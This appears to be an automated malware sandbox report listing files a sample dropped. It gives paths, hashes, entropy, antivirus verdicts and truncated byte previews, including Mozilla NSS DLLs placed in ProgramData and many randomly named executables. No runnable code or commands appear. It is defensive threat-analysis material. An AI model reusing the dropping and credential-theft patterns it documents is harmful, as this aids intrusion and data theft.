                                                                                                                                                                                                                                Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                                                                                                                                                                C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):80880
                                                                                                                                                                                                                                Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\01ySZukOlUcP5NF6FSceJyuX.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884110511290614
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:U0NF76666666666666666666666666666666x666666666666666fwwwwwwwwww1:LPMki6zio75L3pf3dedO4keCIwkoYbgV
                                                                                                                                                                                                                                MD5:40E88D7AC83BDD7C3CBCD6450BCCBC96
                                                                                                                                                                                                                                SHA1:945EED19A3B608C62B8D9049B1CDFC9C1DFA9DA7
                                                                                                                                                                                                                                SHA-256:E5013050AFE1A21A6F1D93A9993E36B66DF5ADE527E410A205E4352D280427BA
                                                                                                                                                                                                                                SHA-512:CA4A0F78957C4A9158CA272FA14B0CE074E6CCFD6812A089BB3E83646A86AFF32D12D4DEF7201EA80088A1BD0E5659B0D03C7C90F791D0A72DBDAA06173A1188
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.......R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\0yHxI2NgcVq897URfu1bGLCU.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\10ff9npsu4lZrEUNQDLknd3T.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):473089
                                                                                                                                                                                                                                Entropy (8bit):7.146087505769809
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
                                                                                                                                                                                                                                MD5:CCEE6D525CB5940F123C86DB6EDD40DA
                                                                                                                                                                                                                                SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
                                                                                                                                                                                                                                SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
                                                                                                                                                                                                                                SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\1CGwy9Tr3ZgPn871BvByOPxR.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884110719809745
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:p0NF76666666666666666666666666666666x666666666666666fwwwwwwwwww9:8PMki6zio75L3pf3dedO4keCIwkoYbgd
                                                                                                                                                                                                                                MD5:4A0CDEE2B2F1A5B731876005B2366EA8
                                                                                                                                                                                                                                SHA1:7F08411C51C285250FD0D26D0957725C7AC2E7B6
                                                                                                                                                                                                                                SHA-256:258DECB49C4EBC7F295BF24A8FEA30A9555449906A8C97164EA8E37014A68D2B
                                                                                                                                                                                                                                SHA-512:66E455537D5D291D746A0875C9BF38B5DAB9F200AFA9B22B97C631D5D81AF94B850849388FE67BD0F7CC16894B73A3D53D7813B1472DDFBF375954E3F4A60113
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.....".R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\3CfyWUQfEPMLfwgMw9RKzj9q.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884109464357738
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:+0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwU:FPMki6zio75L3pf3dedO4keCIwkoYbg0
                                                                                                                                                                                                                                MD5:0516BFB6D3E6E57D6DD66D1416A93712
                                                                                                                                                                                                                                SHA1:518E6149AA2FE441F0CC9D780DCBCD43C9B1EE91
                                                                                                                                                                                                                                SHA-256:A71EAA7C53B1E1DBA6FCE103B5805525BCD0257562DA4610D56918926C11EBDA
                                                                                                                                                                                                                                SHA-512:E080A764660F15135F80A5BF93BC0A54D22DFBB086791FAB3FB380C66846366ED7A2027C4BE7CF64EC14774E139D2EB45086F533D02960472253C2D7225D7D3C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.......R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\3G30xcq8tfWItduGYVyT9CxK.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\3byEz2syG9SedsHKOY8fjUva.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\4H9gwSn9hsmr1uT7Ln1OMxxi.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4407808
                                                                                                                                                                                                                                Entropy (8bit):7.9915034437777726
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
                                                                                                                                                                                                                                MD5:3953BBAD77CDCB9D5AF2694EED7E6688
                                                                                                                                                                                                                                SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
                                                                                                                                                                                                                                SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
                                                                                                                                                                                                                                SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                                                                                                                Reputation:unknown
